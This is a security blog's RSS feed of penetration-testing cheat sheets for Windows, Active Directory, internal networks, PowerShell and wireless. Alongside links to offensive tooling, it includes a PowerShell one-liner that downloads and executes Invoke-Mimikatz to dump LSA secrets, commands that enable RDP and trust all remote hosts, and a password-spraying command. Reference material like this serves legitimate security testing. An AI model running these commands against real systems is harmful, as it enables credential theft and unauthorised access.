<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cheat Sheet &#8211; \x44\x61\x6e\x6b</title>
	<atom:link href="/category/cheat-sheet/feed/" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>Dank adventures in security</description>
	<lastBuildDate>Mon, 27 Mar 2023 05:25:56 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.1.1</generator>
	<item>
		<title>Cheatsheet &#8211; Microsoft Windows Pentesting</title>
		<link>/2021/07/19/cheatsheet-microsoft-windows/</link>
					<comments>/2021/07/19/cheatsheet-microsoft-windows/#respond</comments>
		
		<dc:creator><![CDATA[Dank]]></dc:creator>
		<pubDate>Mon, 19 Jul 2021 10:26:38 +0000</pubDate>
				<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">/blog/?p=71</guid>

					<description><![CDATA[A living cheatsheet of commands and tips i've encountered during my day to day which are good enough to share :)]]></description>
										<content:encoded><![CDATA[
<p class="has-large-font-size"><strong>Random Notes:</strong></p>



<ul>
<li>Testing for CLM: </li>
</ul>



<pre class="wp-block-preformatted">$ExecutionContext.SessionState.LanguageMode</pre>



<ul>
<li>Enable RDP &#038; Firewall:
<ul>
<li>reg add &#8220;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&#8221; /v fDenyTSConnections /t REG_DWORD /d 0 /f</li>



<li>netsh firewall set service type = remotedesktop mode = enable</li>
</ul>
</li>
</ul>



<p class="has-large-font-size"><strong>Local Privilege Escalation:</strong></p>



<p>Cheatsheet Resources:</p>



<ul>
<li>https://book.hacktricks.xyz/windows/windows-local-privilege-escalation</li>
</ul>



<p class="has-large-font-size"><strong>Dumping Credentials:</strong></p>



<p>Bypassing PPL:</p>



<ul>
<li>https://github.com/itm4n/PPLdump</li>



<li>https://github.com/RedCursorSecurityConsulting/PPLKiller</li>
</ul>



<p>Dump LSASS bypassing AV/EDR</p>



<ul>
<li>https://github.com/outflanknl/Dumpert</li>
</ul>



<p>Mimikatz:</p>



<ul>
<li>https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
<ul>
<li>iex (New-Object Net.Webclient).DownloadString(&#8220;https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1&#8221;)</li>



<li>Invoke-Mimikatz -Command &#8216;&#8221;token::elevate&#8221; &#8220;lsadump::secrets&#8221;&#8216;</li>
</ul>
</li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/2021/07/19/cheatsheet-microsoft-windows/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cheatsheet &#8211; Active Directory Pentesting</title>
		<link>/2021/07/19/cheatsheet-active-directory-pentesting/</link>
					<comments>/2021/07/19/cheatsheet-active-directory-pentesting/#respond</comments>
		
		<dc:creator><![CDATA[Dank]]></dc:creator>
		<pubDate>Mon, 19 Jul 2021 10:24:02 +0000</pubDate>
				<category><![CDATA[Active Directory]]></category>
		<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<guid isPermaLink="false">/blog/?p=53</guid>

					<description><![CDATA[A living cheatsheet of commands and tips i've encountered during my day to day which are good enough to share :)]]></description>
										<content:encoded><![CDATA[
<p class="has-large-font-size"><strong>Top cheat sheet resources:</strong></p>



<ul><li>https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet</li><li>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md</li><li>https://book.hacktricks.xyz/windows/active-directory-methodology</li><li>https://github.com/infosecn1nja/AD-Attack-Defense</li><li>https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet</li></ul>



<p class="has-large-font-size"><strong>ACL/ACE Abuse Resources:</strong></p>



<ul><li>https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces</li></ul>



<p class="has-large-font-size"><strong>To Review:</strong></p>



<ul><li>http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/</li><li>https://adsecurity.org/?p=2011</li><li>https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#unconstrained-delegation</li><li>https://sixdub.medium.com/derivative-local-admin-cdd09445aac8</li><li>https://exploit.ph/powerview.html</li><li>https://exploit.ph/user-constrained-delegation.html</li><li>https://exploit.ph/revisiting-delegate-2-thyself.html</li><li>https://swarm.ptsecurity.com/kerberoasting-without-spns/</li><li>https://www.aisp.sg/document/CRESTConSpeaker/Delegate_or_Escalate.pdf</li></ul>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/2021/07/19/cheatsheet-active-directory-pentesting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cheatsheet &#8211; Internal Infrastructure Pentesting</title>
		<link>/2021/07/19/cheatsheet-internal-infrastructure-pentesting/</link>
					<comments>/2021/07/19/cheatsheet-internal-infrastructure-pentesting/#respond</comments>
		
		<dc:creator><![CDATA[Dank]]></dc:creator>
		<pubDate>Mon, 19 Jul 2021 10:20:27 +0000</pubDate>
				<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[Infrastructure]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[infrastructure]]></category>
		<guid isPermaLink="false">/blog/?p=57</guid>

					<description><![CDATA[A living cheatsheet of commands and tips i've encountered during my day to day which are good enough to share :)]]></description>
										<content:encoded><![CDATA[
<p class="has-large-font-size"><strong>Unauthenticated Vectors:</strong></p>



<p>Password Spraying:</p>



<ul><li>https://book.hacktricks.xyz/windows/active-directory-methodology/password-spraying</li><li>https://github.com/Greenwolf/Spray</li><li>MSF: use auxiliary/scanner/smb/smb_login</li><li>CrackMapExec: crackmapexec cmd &lt;targetfile&gt; -u user -p pass -d domain</li></ul>



<p>Relaying Credentials with ntlmrelayx:</p>



<ul><li>https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/</li></ul>



<p class="has-large-font-size"><strong>Authenticated Vectors:</strong></p>



<p>Start CMD with secondary user credentials:</p>



<ul><li>Local: runas /netonly /user:&lt;username&gt; cmd.exe</li><li>Domain: runas /netonly /user:&lt;domain&gt;\&lt;username&gt; cmd.exe</li></ul>



<p>Log into System:</p>



<ul><li>winrs -r:&lt;computername> cmd.exe</li><li>Enter-PSSession -ComputerName &lt;computername></li></ul>



<p>Enable PowerShell Remoting</p>



<ul><li>Enable: Enable-PSRemoting –force</li><li>Check WinRM Running: Get-WmiObject &#8211;<strong>Class</strong> win32_service | Where-Object {$_.name -like &#8220;WinRM&#8221;}</li><li>Set  all remote hosts to trusted: Set-Item WSMan:localhost\client\trustedhosts -value *<ul><li>Verify Configuration: Get-Item WSMan:\localhost\Client\TrustedHosts</li></ul></li></ul>



<p class="has-large-font-size"><strong>Windows Activities:</strong></p>



<p>See: /index.php/2021/07/19/cheatsheet-microsoft-windows/</p>
]]></content:encoded>
					
					<wfw:commentRss>/2021/07/19/cheatsheet-internal-infrastructure-pentesting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cheatsheet &#8211; PowerShell Pentesting</title>
		<link>/2021/07/19/cheatsheet-powershell-pentesting/</link>
					<comments>/2021/07/19/cheatsheet-powershell-pentesting/#respond</comments>
		
		<dc:creator><![CDATA[Dank]]></dc:creator>
		<pubDate>Mon, 19 Jul 2021 10:10:54 +0000</pubDate>
				<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[powershell]]></category>
		<guid isPermaLink="false">/blog/?p=59</guid>

					<description><![CDATA[A living cheatsheet of commands and tips i've encountered during my day to day which are good enough to share :)]]></description>
										<content:encoded><![CDATA[
<p>Creating PSCredential Objects</p>



<pre class="wp-block-code"><code># username and password
$userName = '<strong>user</strong>'
$userPassword = '<strong>pass</strong>'

# Convert passwird to SecureString
$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force

# Create PSCredential Object
$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)</code></pre>



<p>Oneliner</p>



<pre class="wp-block-code"><code>$credObject = New-Object System.Management.Automation.PSCredential ('<strong>username</strong>', (ConvertTo-SecureString '<strong>password</strong>' -AsPlainText -Force))</code></pre>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/2021/07/19/cheatsheet-powershell-pentesting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cheatsheet &#8211; Wireless Security</title>
		<link>/2020/12/03/wireless-security-cheat-sheet/</link>
					<comments>/2020/12/03/wireless-security-cheat-sheet/#respond</comments>
		
		<dc:creator><![CDATA[Dank]]></dc:creator>
		<pubDate>Thu, 03 Dec 2020 23:16:25 +0000</pubDate>
				<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[Wireless Security]]></category>
		<category><![CDATA[cheat sheet]]></category>
		<category><![CDATA[EAP]]></category>
		<category><![CDATA[Enterprise]]></category>
		<category><![CDATA[wireless security]]></category>
		<guid isPermaLink="false">/blog/?p=25</guid>

					<description><![CDATA[A living cheat sheet of wireless information]]></description>
										<content:encoded><![CDATA[
<p><strong>Personal Networks</strong>:</p>



<ul>
<li>Typical WEP &amp; WPA is bad, WPA2 is good</li>
</ul>



<p><strong>Enterprise Networks</strong>:</p>



<p>Overview of Enterprise security, WPA modes, Enterprise network architecture and deployment guide:</p>



<ul>
<li><a href="/a-crash-course-into-wpa-enterprise-security-and-deployment" target="_blank" rel="noreferrer noopener">/a-crash-course-into-wpa-enterprise-security-and-deployment</a></li>
</ul>



<p>Whitepaper on attacking and defending Enterprise networks:</p>



<ul>
<li>Whitepaper overview: <a href="/attacking-and-defending-wpa-enterprise-networks" target="_blank" rel="noreferrer noopener">/</a><a rel="noreferrer noopener" href="/index.php/archive/attacking-and-defending-wpa-enterprise-networks" target="_blank">/attacking-and-defending-wpa-enterprise-networks</a></li>
</ul>



<ul>
<li>Whitepaper full pdf: <a href="/attacking-and-defending-wpa-enterprise-networks/attacking-and-defending-wpa-enterprise-networks.pdf">/attacking-and-defending-wpa-enterprise-networks/attacking-and-defending-wpa-enterprise-networks.pdf</a></li>
</ul>



<p>EAP Method Compatability Tables (Taken from blog post)</p>



<ul>
<li><strong>Tunnelled EAP Methods</strong></li>
</ul>



<figure class="wp-block-image size-large"><img decoding="async" width="525" height="422" src="/wp-content/uploads/2022/07/Tunnelled-EAP-Methods.png" alt="" class="wp-image-92" srcset="/wp-content/uploads/2022/07/Tunnelled-EAP-Methods.png 525w, /wp-content/uploads/2022/07/Tunnelled-EAP-Methods-300x241.png 300w" sizes="(max-width: 525px) 100vw, 525px" /></figure>



<ul>
<li><strong>Native EAP Methods</strong></li>
</ul>



<figure class="wp-block-image size-large"><img decoding="async" width="522" height="268" src="/wp-content/uploads/2022/07/Native-EAP-Methods.png" alt="" class="wp-image-93" srcset="/wp-content/uploads/2022/07/Native-EAP-Methods.png 522w, /wp-content/uploads/2022/07/Native-EAP-Methods-300x154.png 300w" sizes="(max-width: 522px) 100vw, 522px" /></figure>
]]></content:encoded>
					
					<wfw:commentRss>/2020/12/03/wireless-security-cheat-sheet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
